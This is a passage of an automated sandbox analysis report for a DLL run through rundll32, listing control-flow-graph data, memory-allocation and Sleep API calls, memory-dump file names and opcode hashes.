                    control_flow_graph 61 6c7c6180-6c7c618a 62 6c7c6218-6c7c621b 61->62 63 6c7c6190-6c7c619b 61->63 66 6c7c6488-6c7c648d 62->66 67 6c7c6221-6c7c6233 62->67 64 6c7c619d-6c7c61a6 63->64 65 6c7c61d4-6c7c61ed call 6c7c5c04 63->65 69 6c7c61ac-6c7c61b7 call 6c7c5c04 64->69 70 6c7c61a8-6c7c61aa 64->70 86 6c7c61ef-6c7c61f5 65->86 87 6c7c6213-6c7c6216 65->87 71 6c7c5ab8-6c7c5ad6 66->71 72 6c7c6493-6c7c6495 66->72 73 6c7c6348-6c7c634d 67->73 74 6c7c6239-6c7c623e 67->74 104 6c7c61cf-6c7c61d1 69->104 105 6c7c61b9-6c7c61cd call 6c7c57c0 call 6c7c5f88 69->105 78 6c7c5adc-6c7c5ae5 71->78 79 6c7c5bbb-6c7c5bbf 71->79 81 6c7c6440-6c7c645f call 6c7c5c04 73->81 82 6c7c6353-6c7c635b 73->82 75 6c7c6248-6c7c624e 74->75 76 6c7c6240-6c7c6244 74->76 83 6c7c6265-6c7c6280 75->83 84 6c7c6250-6c7c6256 75->84 88 6c7c5aeb 78->88 89 6c7c5ae7-6c7c5ae9 78->89 90 6c7c5bcb-6c7c5bd6 call 6c7c5c04 79->90 91 6c7c5bc1-6c7c5bc9 79->91 120 6c7c6461-6c7c6467 81->120 121 6c7c6432-6c7c6436 81->121 82->81 93 6c7c6361-6c7c6368 82->93 97 6c7c62c8-6c7c62d5 83->97 98 6c7c6282-6c7c628f 83->98 94 6c7c625c-6c7c6263 84->94 95 6c7c6320-6c7c632b call 6c7c5c04 84->95 99 6c7c61fa-6c7c6211 call 6c7c5f88 86->99 100 6c7c61f7 86->100 101 6c7c5aed-6c7c5b13 VirtualQuery 88->101 89->101 102 6c7c5bfa-6c7c5c03 90->102 139 6c7c5bd8-6c7c5bde 90->139 91->102 106 6c7c636a-6c7c6377 93->106 107 6c7c63c5-6c7c63ca 93->107 94->76 94->83 152 6c7c632d-6c7c6341 call 6c7c57c0 call 6c7c5f88 95->152 153 6c7c6343-6c7c6347 95->153 116 6c7c62d7-6c7c62dd 97->116 117 6c7c62e0-6c7c62ef 97->117 110 6c7c62c0-6c7c62c5 98->110 111 6c7c6291-6c7c629a 98->111 99->87 100->99 114 6c7c5b15-6c7c5b27 101->114 115 6c7c5b83-6c7c5b8e call 6c7c5c04 101->115 105->104 108 6c7c63ac-6c7c63b9 106->108 109 6c7c6379-6c7c6382 106->109 112 6c7c63cc-6c7c63d6 call 6c7c57dc 107->112 113 6c7c63d7-6c7c63fb 107->113 124 6c7c6439 108->124 125 6c7c63bb-6c7c63c3 108->125 109->106 123 6c7c6384-6c7c639c Sleep 109->123 110->97 111->98 126 6c7c629c-6c7c62b2 Sleep 111->126 112->113 128 6c7c63fd-6c7c6404 113->128 129 6c7c6408-6c7c641b 113->129 114->115 130 6c7c5b29-6c7c5b3e 114->130 115->102 163 6c7c5b90-6c7c5b96 115->163 131 6c7c62f6-6c7c6306 116->131 117->131 132 6c7c62f1 call 6c7c57dc 117->132 136 6c7c646c-6c7c6486 call 6c7c5790 call 6c7c5f88 120->136 137 6c7c6469 120->137 123->108 140 6c7c639e-6c7c63a9 Sleep 123->140 124->81 125->107 125->124 126->110 141 6c7c62b4-6c7c62bd Sleep 126->141 143 6c7c6424-6c7c6430 128->143 129->143 146 6c7c641d-6c7c641f call 6c7c581c 129->146 144 6c7c5b40 130->144 145 6c7c5b42-6c7c5b56 VirtualAlloc 130->145 149 6c7c6308-6c7c630d call 6c7c581c 131->149 150 6c7c6312-6c7c631f 131->150 132->131 137->136 156 6c7c5be8-6c7c5bf5 call 6c7c57c0 call 6c7c5f88 139->156 157 6c7c5be0-6c7c5be5 139->157 140->106 141->98 143->121 144->145 145->115 159 6c7c5b58-6c7c5b6c VirtualAlloc 145->159 146->143 149->150 152->153 156->102 157->156 159->115 168 6c7c5b6e-6c7c5b81 159->168 169 6c7c5b98-6c7c5b9d 163->169 170 6c7c5ba0-6c7c5bb9 call 6c7c5790 call 6c7c5f88 163->170 168->102 169->170 170->102
                    Memory Dump Source
                    • Source File: 0000000D.00000002.1864689717.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000D.00000002.1864667575.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1864689717.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865187281.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865314563.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865339541.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865361125.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865384535.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865410095.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865429222.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865446874.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865466232.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865487817.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ea60b9ef0bf18137861c3ac71fbddb7810b44d25914d07aa2ed1a1db3fc3233
                    • Instruction ID: f2c5e0198c3a1b731bd94b34d50d29ae6638226b3bc0050a8b946f17ed47c2a2
                    • Opcode Fuzzy Hash: 1ea60b9ef0bf18137861c3ac71fbddb7810b44d25914d07aa2ed1a1db3fc3233
                    • Instruction Fuzzy Hash: 2CC138627116020FE7048A7CEEC87AEB696DBC5325F58823DE214CBBC6DB75CA459343
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5C04 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 181 6c7c5c04-6c7c5c16 182 6c7c5c1c-6c7c5c2c 181->182 183 6c7c5e64-6c7c5e69 181->183 184 6c7c5c2e-6c7c5c3b 182->184 185 6c7c5c84-6c7c5c8d 182->185 186 6c7c5f7c-6c7c5f7f 183->186 187 6c7c5e6f-6c7c5e80 183->187 190 6c7c5c3d-6c7c5c4a 184->190 191 6c7c5c54-6c7c5c60 184->191 185->184 192 6c7c5c8f-6c7c5c9b 185->192 188 6c7c5f85-6c7c5f87 186->188 189 6c7c59b0-6c7c59d9 VirtualAlloc 186->189 193 6c7c5e28-6c7c5e35 187->193 194 6c7c5e82-6c7c5e9e 187->194 195 6c7c5a0b-6c7c5a11 189->195 196 6c7c59db-6c7c5a08 call 6c7c5964 189->196 199 6c7c5c4c-6c7c5c50 190->199 200 6c7c5c74-6c7c5c81 190->200 201 6c7c5cd8-6c7c5ce1 191->201 202 6c7c5c62-6c7c5c70 191->202 192->184 204 6c7c5c9d-6c7c5ca9 192->204 193->194 203 6c7c5e37-6c7c5e40 193->203 197 6c7c5eac-6c7c5ebb 194->197 198 6c7c5ea0-6c7c5ea8 194->198 196->195 207 6c7c5ebd-6c7c5ed1 197->207 208 6c7c5ed4-6c7c5edc 197->208 206 6c7c5f08-6c7c5f1e 198->206 209 6c7c5d1c-6c7c5d26 201->209 210 6c7c5ce3-6c7c5cf0 201->210 203->193 211 6c7c5e42-6c7c5e56 Sleep 203->211 204->184 212 6c7c5cab-6c7c5cb7 204->212 220 6c7c5f37-6c7c5f43 206->220 221 6c7c5f20-6c7c5f2e 206->221 207->206 215 6c7c5ede-6c7c5ef6 208->215 216 6c7c5ef8-6c7c5efa call 6c7c58e8 208->216 218 6c7c5d98-6c7c5da4 209->218 219 6c7c5d28-6c7c5d53 209->219 210->209 217 6c7c5cf2-6c7c5cfb 210->217 211->194 222 6c7c5e58-6c7c5e5f Sleep 211->222 212->185 213 6c7c5cb9-6c7c5cc9 Sleep 212->213 213->184 225 6c7c5ccf-6c7c5cd6 Sleep 213->225 226 6c7c5eff-6c7c5f07 215->226 216->226 217->210 227 6c7c5cfd-6c7c5d11 Sleep 217->227 223 6c7c5dcc-6c7c5ddb call 6c7c58e8 218->223 224 6c7c5da6-6c7c5db8 218->224 229 6c7c5d6c-6c7c5d7a 219->229 230 6c7c5d55-6c7c5d63 219->230 232 6c7c5f64 220->232 233 6c7c5f45-6c7c5f58 220->233 221->220 231 6c7c5f30 221->231 222->193 243 6c7c5ded-6c7c5e26 223->243 247 6c7c5ddd-6c7c5de7 223->247 234 6c7c5dbc-6c7c5dca 224->234 235 6c7c5dba 224->235 225->185 227->209 238 6c7c5d13-6c7c5d1a Sleep 227->238 240 6c7c5d7c-6c7c5d96 call 6c7c581c 229->240 241 6c7c5de8 229->241 230->229 239 6c7c5d65 230->239 231->220 236 6c7c5f69-6c7c5f7b 232->236 233->236 242 6c7c5f5a-6c7c5f5f call 6c7c581c 233->242 234->243 235->234 238->210 239->229 240->243 241->243 242->236
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 6C7C5CBB
                    • Sleep.KERNEL32(0000000A,00000000), ref: 6C7C5CD1
                    • Sleep.KERNEL32(00000000), ref: 6C7C5CFF
                    • Sleep.KERNEL32(0000000A,00000000), ref: 6C7C5D15
                    Memory Dump Source
                    • Source File: 0000000D.00000002.1864689717.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000D.00000002.1864667575.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1864689717.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865187281.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865314563.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865339541.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865361125.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865384535.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865410095.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865429222.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865446874.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865466232.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865487817.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000D.00000002.1865508983.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: e3c4e3bc7278a8916eb5486ca12de4840350277834837aaa8f53c5b68baf8ce9
                    • Instruction ID: 3ad47697c7567809d0d2c5fc4ed53e3fdf55c7785e0609ed8d820f4237a0854e
                    • Opcode Fuzzy Hash: e3c4e3bc7278a8916eb5486ca12de4840350277834837aaa8f53c5b68baf8ce9
                    • Instruction Fuzzy Hash: 03C163767053428FEB45CF29EAC435ABBF5AB82314F58827ED1148BBC1CBB19440DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:5.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:109
                    Total number of Limit Nodes:3
                    execution_graph 409 6c7c6180 410 6c7c6218 409->410 411 6c7c6190 409->411 414 6c7c5ab8 410->414 415 6c7c6221 410->415 412 6c7c619d 411->412 413 6c7c61d4 411->413 417 6c7c61a8 412->417 423 6c7c5c04 10 API calls 412->423 416 6c7c5c04 10 API calls 413->416 418 6c7c6493 414->418 421 6c7c5adc VirtualQuery 414->421 422 6c7c5bbb 414->422 419 6c7c6239 415->419 437 6c7c6348 415->437 420 6c7c61eb 416->420 425 6c7c625c 419->425 430 6c7c6320 419->430 460 6c7c6240 419->460 427 6c7c6213 420->427 432 6c7c61f7 420->432 438 6c7c5b15 421->438 439 6c7c5b83 421->439 428 6c7c5bc1 422->428 434 6c7c5c04 10 API calls 422->434 429 6c7c61b5 423->429 424 6c7c63ac 426 6c7c5c04 10 API calls 424->426 451 6c7c63c5 424->451 443 6c7c629c Sleep 425->443 425->460 431 6c7c645c 426->431 435 6c7c61cf 429->435 436 6c7c61b9 429->436 440 6c7c5c04 10 API calls 430->440 446 6c7c6469 431->446 431->451 456 6c7c5f88 10 API calls 432->456 441 6c7c5bd2 434->441 452 6c7c5f88 10 API calls 436->452 437->424 442 6c7c6384 Sleep 437->442 437->451 438->439 449 6c7c5b40 438->449 450 6c7c5b42 VirtualAlloc 438->450 470 6c7c5c04 439->470 445 6c7c6329 440->445 441->428 457 6c7c5be0 441->457 442->424 447 6c7c639e Sleep 442->447 448 6c7c62b4 Sleep 443->448 443->460 454 6c7c632d 445->454 455 6c7c6343 445->455 463 6c7c5f88 10 API calls 446->463 447->437 448->425 449->450 450->439 458 6c7c5b58 VirtualAlloc 450->458 459 6c7c61cd 452->459 453 6c7c5b8a 453->428 467 6c7c5b98 453->467 465 6c7c5f88 10 API calls 454->465 461 6c7c6211 456->461 464 6c7c5f88 10 API calls 457->464 458->439 462 6c7c5b6e 458->462 459->435 461->427 462->428 466 6c7c6480 463->466 464->428 468 6c7c6341 465->468 494 6c7c5f88 467->494 468->455 471 6c7c5c1c 470->471 472 6c7c5e64 470->472 482 6c7c5c2e 471->482 484 6c7c5cb9 Sleep 471->484 473 6c7c5f7c 472->473 474 6c7c5e28 472->474 475 6c7c5f85 473->475 476 6c7c59b0 VirtualAlloc 473->476 483 6c7c5e42 Sleep 474->483 485 6c7c5e82 474->485 475->453 478 6c7c59eb 476->478 479 6c7c59db 476->479 477 6c7c5c3d 477->453 478->453 514 6c7c5964 479->514 481 6c7c5d1c 493 6c7c5d28 481->493 519 6c7c58e8 481->519 482->477 482->481 488 6c7c5cfd Sleep 482->488 483->485 486 6c7c5e58 Sleep 483->486 484->482 487 6c7c5ccf Sleep 484->487 489 6c7c58e8 VirtualAlloc 485->489 490 6c7c5ea0 485->490 486->474 487->471 488->481 492 6c7c5d13 Sleep 488->492 489->490 490->453 492->482 493->453 495 6c7c5f9d 494->495 496 6c7c6080 494->496 498 6c7c5fa3 495->498 502 6c7c601a Sleep 495->502 497 6c7c5a14 496->497 496->498 499 6c7c617a 497->499 500 6c7c5964 2 API calls 497->500 501 6c7c5fac 498->501 504 6c7c605e Sleep 498->504 509 6c7c6095 498->509 499->462 505 6c7c5a25 500->505 501->462 502->498 503 6c7c6034 Sleep 502->503 503->495 506 6c7c6074 Sleep 504->506 504->509 507 6c7c5a3b VirtualFree 505->507 508 6c7c5a55 505->508 506->498 510 6c7c5a4c 507->510 508->510 511 6c7c5a5e VirtualQuery VirtualFree 508->511 512 6c7c6114 VirtualFree 509->512 513 6c7c60b8 509->513 510->462 511->508 511->510 512->462 513->462 515 6c7c59ac 514->515 516 6c7c596d 514->516 515->478 516->515 517 6c7c5978 Sleep 516->517 517->515 518 6c7c5992 Sleep 517->518 518->516 520 6c7c587c 519->520 521 6c7c58f1 VirtualAlloc 520->521 522 6c7c5908 521->522 522->493

                    Callgraph

                    Executed Functions

                    Function 6C7C58E8 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,6C7C5EFF), ref: 6C7C58FF
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1858086486.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000F.00000002.1858053932.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858827618.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858860200.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858886819.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858911013.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858937048.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858962632.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858984990.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859009218.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859031907.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859055641.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: b07b5c47dd708c648f9113094805e2a77233329719ea020010033c7f4deb6e9c
                    • Instruction ID: 4794626067cc3563887c76531e53d3a075ca025a932c8d9a31275ab1644736e6
                    • Opcode Fuzzy Hash: b07b5c47dd708c648f9113094805e2a77233329719ea020010033c7f4deb6e9c
                    • Instruction Fuzzy Hash: 58F0AFF6B013025FFB548F789A857827BE9A709354F51427EEA09DBBC4E7B088008780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C837D50 Relevance: .0, Instructions: 5COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 5 6c837d50-6c837d59 call 6c837d60
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000F.00000002.1858053932.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858086486.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858827618.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858860200.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858886819.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858911013.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858937048.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858962632.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858984990.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859009218.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859031907.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859055641.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 22e31ec73d5fbead0949c098839360e3aaaccf1c4473ab5c9fed5a6f5f18f1fe
                    • Instruction ID: aa42ff077d3dc69e165479ca5f83194df50831960c9884b1d31ff20054eaed6b
                    • Opcode Fuzzy Hash: 22e31ec73d5fbead0949c098839360e3aaaccf1c4473ab5c9fed5a6f5f18f1fe
                    • Instruction Fuzzy Hash: 89B0123010020C978710DE4CC540C8973D89B04500B40D0207C0807304C730FD0145C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 6C7C5F88 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 7 6c7c5f88-6c7c5f97 8 6c7c5f9d-6c7c5fa1 7->8 9 6c7c6080-6c7c6083 7->9 10 6c7c6004-6c7c600d 8->10 11 6c7c5fa3-6c7c5faa 8->11 12 6c7c6089-6c7c6093 9->12 13 6c7c6170-6c7c6174 9->13 10->11 20 6c7c600f-6c7c6018 10->20 14 6c7c5fac-6c7c5fb7 11->14 15 6c7c5fd8-6c7c5fda 11->15 16 6c7c6044-6c7c6051 12->16 17 6c7c6095-6c7c60a1 12->17 18 6c7c617a-6c7c617f 13->18 19 6c7c5a14-6c7c5a39 call 6c7c5964 13->19 23 6c7c5fb9-6c7c5fbe 14->23 24 6c7c5fc0-6c7c5fd5 14->24 27 6c7c5fdc-6c7c5fed 15->27 28 6c7c5fef 15->28 16->17 21 6c7c6053-6c7c605c 16->21 25 6c7c60d8-6c7c60e6 17->25 26 6c7c60a3-6c7c60a6 17->26 38 6c7c5a3b-6c7c5a4a VirtualFree 19->38 39 6c7c5a55-6c7c5a5c 19->39 20->10 29 6c7c601a-6c7c602e Sleep 20->29 21->16 31 6c7c605e-6c7c6072 Sleep 21->31 33 6c7c60aa-6c7c60ae 25->33 35 6c7c60e8-6c7c60ed call 6c7c57dc 25->35 26->33 27->28 34 6c7c5ff2-6c7c5fff 27->34 28->34 29->11 30 6c7c6034-6c7c603f Sleep 29->30 30->10 31->17 37 6c7c6074-6c7c607b Sleep 31->37 40 6c7c60f0-6c7c60fd 33->40 41 6c7c60b0-6c7c60b6 33->41 34->12 35->33 37->16 44 6c7c5a4c-6c7c5a4e 38->44 45 6c7c5a50-6c7c5a53 38->45 48 6c7c5a5e-6c7c5a7a VirtualQuery VirtualFree 39->48 40->41 43 6c7c60ff-6c7c6106 call 6c7c57dc 40->43 46 6c7c6108-6c7c6112 41->46 47 6c7c60b8-6c7c60d6 call 6c7c581c 41->47 43->41 52 6c7c5a8f-6c7c5a91 44->52 45->52 50 6c7c6114-6c7c613c VirtualFree 46->50 51 6c7c6140-6c7c616d call 6c7c587c 46->51 54 6c7c5a7c-6c7c5a7f 48->54 55 6c7c5a81-6c7c5a87 48->55 56 6c7c5aa6-6c7c5ab6 52->56 57 6c7c5a93-6c7c5aa3 52->57 54->52 55->52 61 6c7c5a89-6c7c5a8d 55->61 57->56 61->48
                    APIs
                    • Sleep.KERNEL32(00000000,?), ref: 6C7C601E
                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 6C7C6038
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1858086486.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000F.00000002.1858053932.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858827618.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858860200.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858886819.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858911013.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858937048.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858962632.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1858984990.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859009218.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859031907.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859055641.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000F.00000002.1859086762.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: f2b55a5635ffe03798493215ae9a491c37686f258a2c6a37dfe4f4378f1983c8
                    • Instruction ID: 4a11ff699402e1e4b79fbe227a1ba2f541035c54c3402bb1390fa3f6465090d2
                    • Opcode Fuzzy Hash: f2b55a5635ffe03798493215ae9a491c37686f258a2c6a37dfe4f4378f1983c8
                    • Instruction Fuzzy Hash: 627124713443028FE741CB29DAC8B6ABBE5AF86318F18827AD544CBBC1D7719984C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C6180 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 63 6c7c6180-6c7c618a 64 6c7c6218-6c7c621b 63->64 65 6c7c6190-6c7c619b 63->65 68 6c7c6488-6c7c648d 64->68 69 6c7c6221-6c7c6233 64->69 66 6c7c619d-6c7c61a6 65->66 67 6c7c61d4-6c7c61ed call 6c7c5c04 65->67 71 6c7c61ac-6c7c61b7 call 6c7c5c04 66->71 72 6c7c61a8-6c7c61aa 66->72 88 6c7c61ef-6c7c61f5 67->88 89 6c7c6213-6c7c6216 67->89 73 6c7c5ab8-6c7c5ad6 68->73 74 6c7c6493-6c7c6495 68->74 75 6c7c6348-6c7c634d 69->75 76 6c7c6239-6c7c623e 69->76 106 6c7c61cf-6c7c61d1 71->106 107 6c7c61b9-6c7c61cd call 6c7c57c0 call 6c7c5f88 71->107 80 6c7c5adc-6c7c5ae5 73->80 81 6c7c5bbb-6c7c5bbf 73->81 83 6c7c6440-6c7c645f call 6c7c5c04 75->83 84 6c7c6353-6c7c635b 75->84 77 6c7c6248-6c7c624e 76->77 78 6c7c6240-6c7c6244 76->78 85 6c7c6265-6c7c6280 77->85 86 6c7c6250-6c7c6256 77->86 90 6c7c5aeb 80->90 91 6c7c5ae7-6c7c5ae9 80->91 92 6c7c5bcb-6c7c5bd6 call 6c7c5c04 81->92 93 6c7c5bc1-6c7c5bc9 81->93 122 6c7c6461-6c7c6467 83->122 123 6c7c6432-6c7c6436 83->123 84->83 95 6c7c6361-6c7c6368 84->95 99 6c7c62c8-6c7c62d5 85->99 100 6c7c6282-6c7c628f 85->100 96 6c7c625c-6c7c6263 86->96 97 6c7c6320-6c7c632b call 6c7c5c04 86->97 101 6c7c61fa-6c7c6211 call 6c7c5f88 88->101 102 6c7c61f7 88->102 103 6c7c5aed-6c7c5b13 VirtualQuery 90->103 91->103 104 6c7c5bfa-6c7c5c03 92->104 141 6c7c5bd8-6c7c5bde 92->141 93->104 108 6c7c636a-6c7c6377 95->108 109 6c7c63c5-6c7c63ca 95->109 96->78 96->85 154 6c7c632d-6c7c6341 call 6c7c57c0 call 6c7c5f88 97->154 155 6c7c6343-6c7c6347 97->155 118 6c7c62d7-6c7c62dd 99->118 119 6c7c62e0-6c7c62ef 99->119 112 6c7c62c0-6c7c62c5 100->112 113 6c7c6291-6c7c629a 100->113 101->89 102->101 116 6c7c5b15-6c7c5b27 103->116 117 6c7c5b83-6c7c5b8e call 6c7c5c04 103->117 107->106 110 6c7c63ac-6c7c63b9 108->110 111 6c7c6379-6c7c6382 108->111 114 6c7c63cc-6c7c63d6 call 6c7c57dc 109->114 115 6c7c63d7-6c7c63fb 109->115 126 6c7c6439 110->126 127 6c7c63bb-6c7c63c3 110->127 111->108 125 6c7c6384-6c7c639c Sleep 111->125 112->99 113->100 128 6c7c629c-6c7c62b2 Sleep 113->128 114->115 130 6c7c63fd-6c7c6404 115->130 